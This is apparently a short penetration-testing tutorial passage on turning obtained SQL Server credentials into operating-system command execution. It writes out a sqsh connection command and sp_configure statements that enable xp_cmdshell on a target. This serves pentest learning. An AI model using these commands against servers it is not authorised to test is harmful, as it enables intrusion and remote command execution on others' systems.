If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.
We’ll start by connecting to our target w/ the following command.
sqsh -S <ipAddress> -U <user> -P <password>
And then we’ll run the following commands to enable XP_CMDSHELL.
EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE 'xp_cmdshell', 1
At this point, we should be able to execute our commands.